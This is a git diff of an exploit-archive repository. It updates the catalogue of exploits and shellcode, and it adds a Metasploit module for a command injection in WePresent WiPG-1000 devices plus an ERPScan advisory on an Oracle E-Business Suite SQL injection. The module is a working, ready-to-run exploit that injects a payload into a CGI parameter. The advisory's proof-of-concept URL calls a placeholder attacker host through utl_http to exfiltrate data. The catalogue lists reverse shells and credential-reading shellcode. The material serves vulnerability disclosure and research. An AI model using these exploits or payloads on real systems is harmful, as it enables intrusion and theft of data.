diff --git a/files.csv b/files.csv index f65640522..87c153afb 100644 --- a/files.csv +++ b/files.csv @@ -2129,7 +2129,7 @@ id,file,description,date,author,platform,type,port 18454,platforms/windows/dos/18454.txt,"NetSarang Xlpd Printer Daemon 4 - Denial of Service",2012-02-02,"SecPod Research",windows,dos,0 18457,platforms/linux/dos/18457.py,"torrent-stats - httpd.c Denial of Service",2012-02-03,otr,linux,dos,0 18458,platforms/php/dos/18458.txt,"PHP 5.4SVN-2012-02-03 - htmlspecialchars/entities Buffer Overflow",2012-02-03,cataphract,php,dos,0 -18460,platforms/php/dos/18460.php,"PHP 5.4.0RC6 (x64t) - Denial of Service",2012-02-04,"Stefan Esser",php,dos,0 +18460,platforms/php/dos/18460.php,"PHP 5.4.0RC6 (x64) - Denial of Service",2012-02-04,"Stefan Esser",php,dos,0 18461,platforms/windows/dos/18461.html,"Edraw Diagram Component 5 - ActiveX Buffer Overflow Denial of Service",2012-02-04,"Senator of Pirates",windows,dos,0 18463,platforms/windows/dos/18463.html,"PDF Viewer Component - ActiveX Denial of Service",2012-02-05,"Senator of Pirates",windows,dos,0 18469,platforms/windows/dos/18469.pl,"TYPSoft FTP Server 1.10 - Multiple Commands Denial of Service",2012-02-07,"Balazs Makany",windows,dos,0 @@ -5397,7 +5397,7 @@ id,file,description,date,author,platform,type,port 41474,platforms/windows/dos/41474.py,"BlueIris 4.5.1.4 - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0 41475,platforms/windows/dos/41475.py,"Synchronet BBS 3.16c - Denial of Service",2017-02-28,"Peter Baris",windows,dos,0 41537,platforms/hardware/dos/41537.py,"Conext ComBox 865-1058 - Denial of Service",2017-03-02,"Mark Liapustin and Arik Kublanov",hardware,dos,0 -41547,platforms/windows/dos/41547.py,"Evostream Media Server 1.7.1 (x64) - Denial of Service",2017-03-07,"Peter Baris",windows,dos,0 +41547,platforms/win_x86-64/dos/41547.py,"Evostream Media Server 1.7.1 (x64) - Denial of Service",2017-03-07,"Peter Baris",win_x86-64,dos,0 41565,platforms/hardware/dos/41565.py,"Livebox 3 Sagemcom SG30_sip-fr-5.15.8.1 - Denial of Service",2017-03-09,"Quentin Olagne",hardware,dos,0 41596,platforms/windows/dos/41596.py,"Cerberus FTP Server 8.0.10.1 - Denial of Service",2017-03-13,"Peter Baris",windows,dos,0 41601,platforms/hardware/dos/41601.c,"MikroTik Router - ARP Table OverFlow Denial Of Service",2017-03-05,FarazPajohan,hardware,dos,0 @@ -5442,6 +5442,7 @@ id,file,description,date,author,platform,type,port 41778,platforms/multiple/dos/41778.cc,"Apple macOS/IOS 10.12.2 (16C67) - 'mach_msg' Heap Overflow",2017-03-30,"Google Security Research",multiple,dos,0 41781,platforms/linux/dos/41781.c,"BackBox OS - Denial of Service",2017-04-02,FarazPajohan,linux,dos,0 41790,platforms/macos/dos/41790.c,"Apple macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking",2017-04-04,"Google Security Research",macos,dos,0 +41916,platforms/windows/dos/41916.py,"PrivateTunnel Client 2.8 - Local Buffer Overflow (SEH)",2017-04-25,Muhann4d,windows,dos,0 41715,platforms/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos,0 41734,platforms/windows/dos/41734.c,"Microsoft Visual Studio 2015 update 3 - Denial of Service",2017-03-26,"Peter Baris",windows,dos,0 41737,platforms/windows/dos/41737.txt,"Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow",2017-03-27,"Nassim Asrir",windows,dos,0 @@ -5471,9 +5472,12 @@ id,file,description,date,author,platform,type,port 41880,platforms/windows/dos/41880.cpp,"Microsoft Windows Kernel - 'win32kfull!SfnINLPUAHDRAWMENUITEM' Stack Memory Disclosure",2017-04-13,"Google Security Research",windows,dos,0 41891,platforms/windows/dos/41891.rb,"Microsoft Windows - Unauthenticated SMB Remote Code Execution (MS17-010) (Metasploit)",2017-04-17,"Sean Dillon",windows,dos,445 41893,platforms/linux/dos/41893.txt,"pinfo 0.6.9 - Local Buffer Overflow",2017-04-18,"Nassim Asrir",linux,dos,0 -41905,platforms/multiple/dos/41905.txt,"VirtualBox - Environment and ioctl Unprivileged Host User to Host Kernel Privilege Escalation",2017-04-20,"Google Security Research",multiple,dos,0 -41906,platforms/multiple/dos/41906.txt,"VirtualBox - 'virtio-net' Guest-to-Host Out-of-Bounds Write",2017-04-20,"Google Security Research",multiple,dos,0 +41898,platforms/linux/dos/41898.txt,"Dmitry 1.3a - Local Buffer Overflow",2017-04-19,FarazPajohan,linux,dos,0 +41905,platforms/multiple/dos/41905.txt,"Oracle VM VirtualBox - Environment and ioctl Unprivileged Host User to Host Kernel Privilege Escalation",2017-04-20,"Google Security Research",multiple,dos,0 +41906,platforms/multiple/dos/41906.txt,"Oracle VM VirtualBox - 'virtio-net' Guest-to-Host Out-of-Bounds Write",2017-04-20,"Google Security Research",multiple,dos,0 41911,platforms/windows/dos/41911.py,"Easy MOV Converter 1.4.24 - Local Buffer Overflow (SEH)",2017-03-12,Muhann4d,windows,dos,0 +41931,platforms/multiple/dos/41931.html,"Apple Safari - Array concat Memory Corruption",2017-04-25,"Google Security Research",multiple,dos,0 +41932,platforms/multiple/dos/41932.cpp,"Oracle VirtualBox Guest Additions 5.1.18 - Unprivileged Windows User-Mode Guest Code Double-Free",2017-04-25,"Google Security Research",multiple,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -8907,8 +8911,8 @@ id,file,description,date,author,platform,type,port 41476,platforms/windows/local/41476.txt,"Cisco AnyConnect Secure Mobility Client 4.3.04027 - Privilege Escalation",2017-02-28,Pcchillin,windows,local,0 41538,platforms/windows/local/41538.cs,"CyberGhost 6.0.4.2205 - Privilege Escalation",2017-03-06,"Kacper Szurek",windows,local,0 41542,platforms/windows/local/41542.c,"USBPcap 1.1.0.0 (WireShark 2.2.5) - Privilege Escalation",2017-03-07,"Parvez Anwar",windows,local,0 -41597,platforms/linux/local/41597.txt,"VirtualBox - Cooperating VMs can Escape from Shared Folder",2017-03-13,"Google Security Research",linux,local,0 -41605,platforms/windows/local/41605.txt,"PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Privilege Escalation",2017-03-15,ReWolf,windows,local,0 +41597,platforms/linux/local/41597.txt,"Oracle VM VirtualBox - Cooperating VMs can Escape from Shared Folder",2017-03-13,"Google Security Research",linux,local,0 +41605,platforms/win_x86-64/local/41605.txt,"PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Privilege Escalation",2017-03-15,ReWolf,win_x86-64,local,0 41607,platforms/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",windows,local,0 41619,platforms/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,windows,local,0 41675,platforms/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,android,local,0 @@ -8950,9 +8954,12 @@ id,file,description,date,author,platform,type,port 41878,platforms/windows/local/41878.txt,"Adobe Creative Cloud Desktop Application < 4.0.0.185 - Privilege Escalation",2017-04-13,hyp3rlinx,windows,local,0 41901,platforms/windows/local/41901.cs,"Microsoft Windows 10 (Build 10586) - 'IEETWCollector' Arbitrary Directory/File Deletion Privilege Escalation",2017-04-20,"Google Security Research",windows,local,0 41902,platforms/windows/local/41902.txt,"Microsoft Windows 10 - Runtime Broker ClipboardBroker Privilege Escalation",2017-04-20,"Google Security Research",windows,local,0 -41904,platforms/multiple/local/41904.txt,"VirtualBox - Guest-to-Host Privilege Escalation via Broken Length Handling in slirp Copy",2017-04-20,"Google Security Research",multiple,local,0 -41907,platforms/linux/local/41907.c,"VirtualBox 5.1.14 r112924 - Unprivileged Host User to Host Kernel Privilege Escalation via ALSA config",2017-04-20,"Google Security Research",linux,local,0 -41908,platforms/windows/local/41908.txt,"VirtualBox 5.0.32 r112930 x64 - Windows Process COM Injection Privilege Escalation",2017-04-20,"Google Security Research",windows,local,0 +41904,platforms/multiple/local/41904.txt,"Oracle VM VirtualBox - Guest-to-Host Privilege Escalation via Broken Length Handling in slirp Copy",2017-04-20,"Google Security Research",multiple,local,0 +41907,platforms/linux/local/41907.c,"Oracle VM VirtualBox 5.1.14 r112924 - Unprivileged Host User to Host Kernel Privilege Escalation via ALSA config",2017-04-20,"Google Security Research",linux,local,0 +41908,platforms/win_x86-64/local/41908.txt,"Oracle VM VirtualBox 5.0.32 r112930 (x64) - Windows Process COM Injection Privilege Escalation",2017-04-20,"Google Security Research",win_x86-64,local,0 +41917,platforms/windows/local/41917.py,"Dell Customer Connect 1.3.28.0 - Privilege Escalation",2017-04-25,"Kacper Szurek",windows,local,0 +41923,platforms/linux/local/41923.txt,"LightDM (Ubuntu 16.04/16.10) - Guest Account Local Privilege Escalation",2017-04-25,"G. Geshev",linux,local,0 +41933,platforms/windows/local/41933.txt,"Realtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation",2017-04-25,"Google Security Research",windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -14017,7 +14024,7 @@ id,file,description,date,author,platform,type,port 32391,platforms/hardware/remote/32391.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (2)",2008-09-17,"Jeremy Brown",hardware,remote,0 33141,platforms/php/remote/33141.rb,"Alienvault Open Source SIEM (OSSIM) - SQL Injection / Remote Code Execution (Metasploit)",2014-05-02,Metasploit,php,remote,443 32390,platforms/hardware/remote/32390.html,"Cisco 871 Integrated Services Router - Cross-Site Request Forgery (1)",2008-09-17,"Jeremy Brown",hardware,remote,0 -32277,platforms/lin_x86-64/remote/32277.txt,"Nginx 1.4.0 (x64) (Generic Linux) - Remote Exploit",2014-03-15,sorbo,lin_x86-64,remote,0 +32277,platforms/lin_x86-64/remote/32277.txt,"Nginx 1.4.0 (Generic Linux x64) - Remote Exploit",2014-03-15,sorbo,lin_x86-64,remote,0 30582,platforms/windows/remote/30582.html,"WinSCP 4.0.3 - URL Protocol Handler Arbitrary File Access",2007-09-13,Kender.Security,windows,remote,0 30589,platforms/windows/remote/30589.txt,"WinImage 8.0/8.10 - File Handling Traversal Arbitrary File Overwrite",2007-09-17,j00ru//vx,windows,remote,0 30600,platforms/windows/remote/30600.html,"Xunlei Web Thunder 5.6.9.344 - ActiveX Control DownURL2 Method Remote Buffer Overflow",2007-09-20,7jdg,windows,remote,0 @@ -15462,6 +15469,9 @@ id,file,description,date,author,platform,type,port 41895,platforms/hardware/remote/41895.rb,"Huawei HG532n - Command Injection (Metasploit)",2017-04-19,Metasploit,hardware,remote,0 41903,platforms/windows/remote/41903.txt,"Microsoft Windows - ManagementObject Arbitrary .NET Serialization Remote Code Execution",2017-04-20,"Google Security Research",windows,remote,0 41910,platforms/linux/remote/41910.sh,"SquirrelMail < 1.4.22 - Remote Code Execution",2017-04-23,"Dawid Golunski",linux,remote,0 +41929,platforms/windows/remote/41929.py,"Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution",2017-04-25,vportal,windows,remote,0 +41934,platforms/windows/remote/41934.rb,"Microsoft Office Word - Malicious Hta Execution (Metasploit)",2017-04-25,Metasploit,windows,remote,0 +41935,platforms/hardware/remote/41935.rb,"WePresent WiPG-1000 - Command Injection (Metasploit)",2017-04-25,Metasploit,hardware,remote,80 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -15876,7 +15886,7 @@ id,file,description,date,author,platform,type,port 15316,platforms/arm/shellcode/15316.asm,"ARM - Loader Port 0x1337 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 15317,platforms/arm/shellcode/15317.asm,"ARM - ifconfig eth0 and Assign Address 192.168.0.2 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0 15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add root user 'shell-storm' with password 'toor' Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0 -15618,platforms/osx/shellcode/15618.c,"OSX/Intel - setuid shell x86_64 Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0 +15618,platforms/osx/shellcode/15618.c,"OSX/Intel (x86-64) - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0 15712,platforms/arm/shellcode/15712.rb,"ARM - Create a New User with UID 0 Shellcode (Metasploit) (Generator) (66+ bytes)",2010-12-09,"Jonathan Salwan",arm,shellcode,0 15879,platforms/win_x86/shellcode/15879.txt,"Win32 - speaking Shellcode",2010-12-31,Skylined,win_x86,shellcode,0 16025,platforms/freebsd_x86/shellcode/16025.c,"FreeBSD/x86 - connect back Shellcode (81 bytes)",2011-01-21,Tosh,freebsd_x86,shellcode,0 @@ -15884,7 +15894,7 @@ id,file,description,date,author,platform,type,port 16283,platforms/win_x86/shellcode/16283.txt,"Win32 - eggsearch Shellcode (33 bytes)",2011-03-05,oxff,win_x86,shellcode,0 17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH (sh4) - setuid(0) / chmod(_/etc/shadow__ 0666) / exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",sh4,shellcode,0 17194,platforms/lin_x86/shellcode/17194.txt,"Linux/x86 - netcat bindshell port 6666 Shellcode (69 bytes)",2011-04-21,"Jonathan Salwan",lin_x86,shellcode,0 -17224,platforms/osx/shellcode/17224.s,"OSX/Intel (x86_64) - reverse_tcp shell Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0 +17224,platforms/osx/shellcode/17224.s,"OSX/Intel (x86-64) - reverse_tcp shell Shellcode (131 bytes)",2011-04-29,hammackj,osx,shellcode,0 17323,platforms/windows/shellcode/17323.c,"Windows - WinExec add new local administrator _RubberDuck_ + ExitProcess Shellcode (279 bytes)",2011-05-25,RubberDuck,windows,shellcode,0 20195,platforms/lin_x86/shellcode/20195.c,"Linux/x86 - ASLR deactivation Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 17326,platforms/windows/shellcode/17326.rb,"Windows - DNS Reverse Download and Exec Shellcode (Metasploit)",2011-05-26,"Alexey Sintsov",windows,shellcode,0 @@ -16004,9 +16014,9 @@ id,file,description,date,author,platform,type,port 39203,platforms/lin_x86-64/shellcode/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0 39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egg-hunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0 39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - xor/not/div Encoded execve Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0 -39336,platforms/linux/shellcode/39336.c,"Linux x86 / x86_64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 -39337,platforms/linux/shellcode/39337.c,"Linux x86 / x86_64 - tcp_bind (Port 4444) Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 -39338,platforms/linux/shellcode/39338.c,"Linux x86 / x86_64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 +39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 +39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - tcp_bind (Port 4444) Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 +39338,platforms/linux/shellcode/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - shell_reverse_tcp with Password Polymorphic Shellcode (1) (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0 39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - shell_reverse_tcp with Password Polymorphic Shellcode (2) (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0 39389,platforms/lin_x86/shellcode/39389.c,"Linux/x86 - Download & Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,lin_x86,shellcode,0 @@ -16034,7 +16044,7 @@ id,file,description,date,author,platform,type,port 39847,platforms/lin_x86-64/shellcode/39847.c,"Linux/x86-64 - Information Stealer Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind Shell Port 4444/TCP Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0 39869,platforms/lin_x86-64/shellcode/39869.c,"Linux/x86-64 - XOR Encode execve Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 -39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86_64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0 +39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0 39900,platforms/win_x86/shellcode/39900.c,"Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 39901,platforms/lin_x86/shellcode/39901.c,"Linux/x86 - /bin/nc -le /bin/sh -vp13337 Shellcode (56 bytes)",2016-06-07,sajith,lin_x86,shellcode,0 39914,platforms/win_x86/shellcode/39914.c,"Windows x86 - system(_systeminfo_) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 @@ -16078,10 +16088,10 @@ id,file,description,date,author,platform,type,port 41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0 41398,platforms/lin_x86-64/shellcode/41398.nasm,"Linux - TCP Reverse Shell Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",lin_x86-64,shellcode,0 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,lin_x86,shellcode,0 -41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0 +41439,platforms/lin_x86-64/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,lin_x86-64,shellcode,0 41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,lu0xheap,win_x86,shellcode,0 41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86-64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0 -41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0 +41477,platforms/lin_x86-64/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",lin_x86-64,shellcode,0 41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0 41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Polymorphic Setuid(0) & Execve(/bin/sh) Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0 41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Polymorphic Flush IPTables Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0 @@ -37767,3 +37777,14 @@ id,file,description,date,author,platform,type,port 41885,platforms/php/webapps/41885.txt,"Concrete5 8.1.0 - 'Host' Header Injection",2017-04-14,hyp3rlinx,php,webapps,0 41890,platforms/php/webapps/41890.txt,"Mantis Bug Tracker 1.3.0/2.3.0 - Password Reset",2017-04-16,hyp3rlinx,php,webapps,0 41900,platforms/multiple/webapps/41900.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'operationSpreadGeneric' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0 +41918,platforms/php/webapps/41918.txt,"FlySpray 1.0-rc4 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-25,"Cyril Vallicari",php,webapps,0 +41919,platforms/php/webapps/41919.txt,"WordPress Plugin KittyCatfish 2.2 - SQL Injection",2017-04-25,"TAD GROUP",php,webapps,80 +41920,platforms/php/webapps/41920.txt,"WordPress Plugin Car Rental System 2.5 - SQL Injection",2017-04-25,"TAD GROUP",php,webapps,80 +41921,platforms/php/webapps/41921.txt,"WordPress Plugin Wow Viral Signups 2.1 - SQL Injection",2017-04-25,"TAD GROUP",php,webapps,80 +41922,platforms/php/webapps/41922.txt,"WordPress Plugin Wow Forms 2.1 - SQL Injection",2017-04-25,"TAD GROUP",php,webapps,80 +41925,platforms/xml/webapps/41925.txt,"Oracle PeopleSoft - 'PeopleSoftServiceListeningConnector' XML External Entity via DOCTYPE",2017-04-25,ERPScan,xml,webapps,0 +41926,platforms/jsp/webapps/41926.txt,"Oracle E-Business Suite 12.2.3 - 'IESFOOTPRINT' SQL Injection",2017-04-25,ERPScan,jsp,webapps,0 +41927,platforms/multiple/webapps/41927.txt,"HPE OpenCall Media Platform (OCMP) 4.3.2 - Cross-Site Scripting / Remote File Inclusion",2017-04-25,"Paolo Stagno",multiple,webapps,0 +41928,platforms/multiple/webapps/41928.py,"OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution",2017-04-25,"Andrey B. Panfilov",multiple,webapps,0 +41930,platforms/php/webapps/41930.txt,"Joomla Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection",2017-04-24,"Persian Hack Team",php,webapps,0 +41936,platforms/php/webapps/41936.txt,"October CMS 1.0.412 - Multiple Vulnerabilities",2017-04-25,"Anti Räis",php,webapps,80 diff --git a/platforms/hardware/remote/41935.rb b/platforms/hardware/remote/41935.rb new file mode 100755 index 000000000..ff267cc95 --- /dev/null +++ b/platforms/hardware/remote/41935.rb @@ -0,0 +1,74 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'WePresent WiPG-1000 Command Injection', + 'Description' => %q{ + This module exploits a command injection vulnerability in an undocumented + CGI file in several versions of the WePresent WiPG-1000 devices. + Version 2.0.0.7 was confirmed vulnerable, 2.2.3.0 patched this vulnerability. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Matthias Brun', # Vulnerability Discovery, Metasploit Module + ], + 'References' => + [ + [ 'URL', 'https://www.redguard.ch/advisories/wepresent-wipg1000.txt' ] + ], + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic netcat openssl' + } + }, + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'Targets' => + [ + ['WiPG-1000 <=2.0.0.7', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Apr 20 2017', + 'DefaultTarget' => 0)) + end + + + def check + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => '/cgi-bin/rdfs.cgi' + }) + if res && res.body.include?("Follow administrator instructions to enter the complete path") + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + + def exploit + print_status('Sending request') + send_request_cgi( + 'method' => 'POST', + 'uri' => '/cgi-bin/rdfs.cgi', + 'vars_post' => { + 'Client' => ";#{payload.encoded};", + 'Download' => 'Download' + } + ) + end + +end \ No newline at end of file diff --git a/platforms/jsp/webapps/41926.txt b/platforms/jsp/webapps/41926.txt new file mode 100755 index 000000000..8abd7c4be --- /dev/null +++ b/platforms/jsp/webapps/41926.txt @@ -0,0 +1,186 @@ +Application: Oracle E-Business Suite +Versions Affected: Oracle EBS 12.2.3 +Vendor URL: http://oracle.com +Bug: SQL injection +Reported: 23.12.2016 +Vendor response: 24.12.2016 +Date of Public Advisory: 18.04.2017 +Reference: Oracle CPU April 2017 +Author: Dmitry Chastuhin (ERPScan) + +Description + +1. ADVISORY INFORMATION + +Title:[ERPSCAN-17-021] SQL Injection in E-Business Suite IESFOOTPRINT +Advisory ID: [ERPSCAN-17-021] +Risk: high +CVE: CVE-2017-3549 +Advisory URL: https://erpscan.com/advisories/erpscan-17-021-sql-injection-e-business-suite-iesfootprint/ +Date published: 18.04.2017 +Vendors contacted: Oracle + + +2. VULNERABILITY INFORMATION + +Class: SQL injection +Impact: read sensitive data, modify data from database +Remotely Exploitable: yes +Locally Exploitable: no + +CVSS Information + +CVSS Base Score v3: 8.0 / 10 +CVSS Base Vector: +AV : Attack Vector (Related exploit range) Network (N) +AC : Attack Complexity (Required attack complexity) High (H) +PR : Privileges Required (Level of privileges needed to exploit) High (H) +UI : User Interaction (Required user participation) None (N) +S : Scope (Change in scope due to impact caused to components beyond +the vulnerable component) Changed (C) +C : Impact to Confidentiality High (H) +I : Impact to Integrity High (H) +A : Impact to Availability High (H) + +3. VULNERABILITY DESCRIPTION + +The code comprises an SQL statement containing strings that can be +altered by an attacker. The manipulated SQL statement can be used then +to retrieve additional data from the database or to modify the data +without authorization. + +4. VULNERABLE PACKAGES + +Oracle EBS 12.2.3 + +5. SOLUTIONS AND WORKAROUNDS + +To correct this vulnerability, implement Oracle CPU April 2017 + +6. AUTHOR + +Dmitry Chastuhin + + +7. TECHNICAL DESCRIPTION + +PoC + +vulnerable jsp name is iesfootprint.jsp + + deployDate = ((request.getParameter("deployDate")) != null) ? +request.getParameter("deployDate") : ""; + responseDate = ((request.getParameter("responseDate")) != null) ? +request.getParameter("responseDate") : ""; + dscriptName = ((request.getParameter("dscript_name")) != null) ? +request.getParameter("dscript_name") : ""; + dscriptId = ((request.getParameter("dscriptId")) != null) ? +request.getParameter("dscriptId") : ""; +%> + +<% +// Process the data based on params +if (showGraph) { + // Create Query String + StringBuffer query = new StringBuffer("SELECT panel_name, +count_panels, avg_time, min_time, max_time, "); + query.append("\'").append(_prompts[10]).append("\'"); + query.append(" Average_Time FROM (SELECT rownum, panel_name, +count_panels, avg_time, min_time, max_time FROM (SELECT Panel_name, +count(panel_name) count_panels, +(sum(total_time)/count(panel_name))/1000 avg_time, min(min_time)/1000 +min_time, max(max_time)/1000 max_time FROM IES_SVY_FOOTPRINT_V WHERE +dscript_id = "); + query.append(dscriptId); + query.append(" AND start_time between "); + query.append("\'").append(deployDate).append("\'"); + query.append(" and "); + query.append("\'").append(responseDate).append("\'"); + query.append(" GROUP BY panel_name ORDER BY avg_time desc)) WHERE +rownum < 11"); + + + + // Get XMLDocument for the corresponding query and Paint graph + try { + + XMLDocument xmlDoc = XMLServ.getSQLasXML(query.toString()); + htmlString =XMLServ.getXMLTransform(xmlDoc,htmlURL); + +Approximate request with SQL injection + + +http://ebs.example.com/OA_HTML/iesfootprint.jsp?showgraph=true&dscriptId=11' +AND utl_http.request('http://attackers_host/lalal')='1' GROUP BY +panel_name)) -- + + + + + +8. ABOUT ERPScan Research + +ERPScan research team specializes in vulnerability research and +analysis of critical enterprise applications. It was acknowledged +multiple times by the largest software vendors like SAP, Oracle, +Microsoft, IBM, VMware, HP for discovering more than 400 +vulnerabilities in their solutions (200 of them just in SAP!). + +ERPScan researchers are proud of discovering new types of +vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The +Best Server-Side Bug" nomination at BlackHat 2013. + +ERPScan experts participated as speakers, presenters, and trainers at +60+ prime international security conferences in 25+ countries across +the continents ( e.g. BlackHat, RSA, HITB) and conducted private +trainings for several Fortune 2000 companies. + +ERPScan researchers carry out the EAS-SEC project that is focused on +enterprise application security awareness by issuing annual SAP +security researches. + 